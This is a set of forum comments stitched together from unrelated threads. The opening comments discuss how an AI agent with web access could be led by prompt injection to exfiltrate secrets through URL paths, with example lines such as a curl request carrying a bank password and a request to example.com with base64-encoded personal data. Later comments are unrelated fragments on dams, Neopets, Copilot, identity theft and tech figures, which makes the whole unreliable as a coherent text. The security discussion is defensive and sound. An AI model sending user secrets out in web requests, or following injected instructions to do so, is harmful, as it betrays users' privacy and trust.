The mere act of browsing the web is "write permissions". If I visit example.com/<my password>, I've now written my password into the web server logs of that site. So the only remaining question is whether I can be tricked/coerced into doing so.
I do tend to think this risk is somewhat mitigated if you have a whitelist of allowed domains that the claw can make HTTP requests to. But I haven't seen many people doing this.
I'm using something that pops up an OAuth window in the browser as needed. I think the general idea is that secrets are handled at the local harness level.
From my limited understanding it seems like writing a little MCP server that defines domains and abilities might work as an additive filter.
Many consumer websites intended for humans do let you create limited-privilege accounts that require approval from a master account for sensitive operations, but these are usually accounts for services that target families and the limited-privilege accounts are intended for children.
No. I was trying to explain that providing web access shouldn't be tantamount to handing over the keys. You should be able to use sites and apps through a limited service account, but this requires them to be built with agents and authorization in mind. REST APIs often exist but are usually written with developers in mind. If agents are going to go maintstream, these APIs need to be more user friendly.
That's not what the parent comment was saying. They are pointing out that you can exfiltrate secret information by querying any web page with that secret information in the path. `curl www.google.com/my-bank-password`. Now, google logs have my bank password in them.
The thought that occurs to me is, the action here that actually needs gating is maybe not the web browsing: it's accessing credentials. That should be relatively easy to gate off behind human approval!
I'd also point out this a place where 2FA/MFA might be super helpful. Your phone or whatever is already going to alert you. There's a little bit of a challenge in being confident your bot isn't being tricked, in ascertaining even if the bot tells you that it really is safe to approve. But it's still a deliberation layer to go through. Our valuable things do often have these additional layers of defense to go through that would require somewhat more advanced systems to bot through, that I don't think are common at all.
Overall I think the will here to reject & deny, the fear uncertainty and doubt is both valid and true, but that people are trying way way way too hard, and it saddens me to see such a strong manifestation of fear. I realize the techies know enough to be horrified strongly by it all, but also, I really want us to be an excited forward looking group, that is interested in tackling challenges, rather than being interested only in critiques & teardowns. This feels like an incredible adventure & I wish to en Courage everyone.
You do need to gate the web browsing. 2FA and/or credential storage helps with passwords, but it doesn't help with other private information. If the claw is currently, or was recently, working with any files on your computer or any of your personal online accounts, then the contents of those files/webpages are in the model context. So a simple HTTP request to example.com/<base64(personal info)> presents the exact same risk.
You can take whatever risks you feel are acceptable for your personal usage - probably nobody cares enough to target an effective prompt-injection attack against you. But corporations? I would bet a large sum of money that within the next few years we will be hearing multiple stories about data breaches caused by this exact vulnerability, due to employees being lazy about limiting the claw's ability to browse the web.
The ground can already support the weight. Anything whatsoever in between the ground and the occupants is sufficient if your goal is to separate their feet from it.
> It's made from a renewable resource (wood) and there's some 400+ million metric tons of paper production yearly
They don’t mean production volume, they mean physically. You can’t increase the thickness of paper by 1000x to just make thicker, stronger, paper. It’s a different material entirely.
I am thinking identity theft. They make you talk, record you so they can speak again with your voice.
I only answer by phone to numbers in my contact nowadays, unless I know I have something scheduled with someone but do not yet know the exact number that will call me.
It sounds stupid but it works. I've seen it. I put Copilot on AI-generated slop PRs and hit refresh until it stops commenting. It's great seeing it take out all the dead code.
> As of 2025, The Medog Dam, currently under construction on the Yarlung Tsangpo river in Mêdog County, China, expected to be completed by 2033, is planned to have a capacity of 60 GW, three times that of the Three Gorges Dam.[3]
Authoritarianism has its draw backs obviously but one of its more efficient points is it can get things done if the will is at the top. Since China doesnt have a large domestic oil supply like the US it is a state security issue to get off oil as fast as possible.
Earlier on was only a couple of years if I remember correctly (obviously my time messing with Neopets is a little fuzzy hardly a core memory!)especially once it was acquired by Viacom.
Did a cursory search so take all this with a grain of salt, but looking at the timeline of when ads are introduced, then the acquisition, peak users, etc. I’d say most people were playing in a pretty serious corporate sandbox for most of its most relevant years.
Yeah, who throws out these sort of timeframe in earnest? We haven't built anything in space since the ISS (which is in LEO mind you, not "outer space"), and we're building full data centers within a decade? Give me a break, that's an Elon level prediction.
> Sam Altman of Loopt is one of the most successful alumni, so we asked him what question we could put on the Y Combinator application that would help us discover more people like him. He said to ask about a time when they'd hacked something to their advantage—hacked in the sense of beating the system, not breaking into computers. It has become one of the questions we pay most attention to when judging applications.
Didn’t face any problems doing it… you mean when was charged by the SEC for lying on Twitter? Or do you mean when he was forced to buy Twitter to avoid another case against him?
You could easily make human approval workflows for this stuff, where humans need to take any interesting action at the recommendation of the bot.
reply